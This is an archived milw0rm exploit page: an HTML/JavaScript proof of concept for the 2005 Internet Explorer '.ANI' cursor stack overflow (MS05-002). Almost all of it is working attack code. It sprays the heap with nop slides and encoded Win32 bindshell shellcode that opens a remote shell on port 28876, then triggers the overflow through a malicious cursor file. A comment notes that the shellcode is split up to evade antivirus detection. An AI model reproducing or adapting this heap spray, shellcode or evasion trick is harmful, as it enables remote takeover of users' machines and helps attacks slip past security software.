Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)

<!-- Changed location of InternetExploiter3.2.ani to point to sploits directory /str0ke -->

<HTML><!--
________________________________________________________________________________

    ,sSSSs,   Ss,       Internet Exploiter 3 v0.2
   SS"  `YS'   '*Ss.    .ANI stackoverflow PoC exploit
  iS'            ,SS"   Copyright (C) 2003, 2004 by Berend-Jan Wever.
  YS,  .ss    ,sY"      http://www.edup.tudelft.nl/~bjwever
  `"YSSP"   sSS         <skylined@edup.tudelft.nl>
________________________________________________________________________________

  Credit for the vulnerability:
    Yuji Ukai for eEye Digital Security
  Patch:
    http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
  Changelog for 3.2:
    - Putting the .ANI file in the HEAD sometimes caused the BoF to trigger
      before the heap was prepared, fixed that by putting it in the BODY.
    - New .ANI file overwrites the stack with a lot of 0x0D bytes, making sure
      it overwrites the return-address no matter where it is on the stack.
      This makes it OS/SP/language independ, thanks to spoonm for the details
      on the .ANI file format.

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.
-->
    <SCRIPT language="javascript">
        // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
        // and/or use as return address. Thanks to blazde for feedback and idears.

        // 4 nops because the 0x0D slide has 5 byte instructions.
        shellcode = unescape("%u3737%u3737" +
            // Win32 bindshell (port 28876, '\0' free, looping). Thanks to
            // HDM and others for inspiration and borrowed code. Source:
            // www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c
            // (Added the "+"-s to fool Norton AV, it would see the
            // shellcode as InternetExploiter 1)
            "%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" +
            "%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" +
            "%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" +
            "%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
            "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" +
            "%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" +
            "%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" +
            "%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" +
            "%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" +
            "%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" +
            "%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" +
            "%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" +
            "%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
            "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" +
            "%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" +
            "%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" +
            "%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
        // Nopslide will contain these bytes:
        bigblock = unescape("%u0D0D%u0D0D");
        // Heap blocks in IE have 20 dwords as header
        headersize = 20;
        // This is all very 1337 code to create a nopslide that will fit exactly
        // between the the header and the shellcode in the heap blocks we want.
        // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
        // documentation for this.
        slackspace = headersize+shellcode.length
        while (bigblock.length<slackspace) bigblock+=bigblock;
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length-slackspace);
        while(block.length+slackspace<0x40000) block = block+block+fillblock;
        // And now we can create the heap blocks, we'll create 700 of them to spray
        // enough memory to be sure enough that we've got one at 0x0D0D0D0D
        memory = new Array();
        for (i=0;i<700;i++) memory[i] = block + shellcode;

        function failed() {
            // You can't lose with this exploit.
            document.location.href="http://www.margrieta.com";
        }
    </SCRIPT>
    <BODY style="CURSOR: url('sploits/InternetExploiter3.2.ani')" onload="setTimeout(failed, 1000);">
    </BODY>
</HTML>

// milw0rm.com [2005-01-12]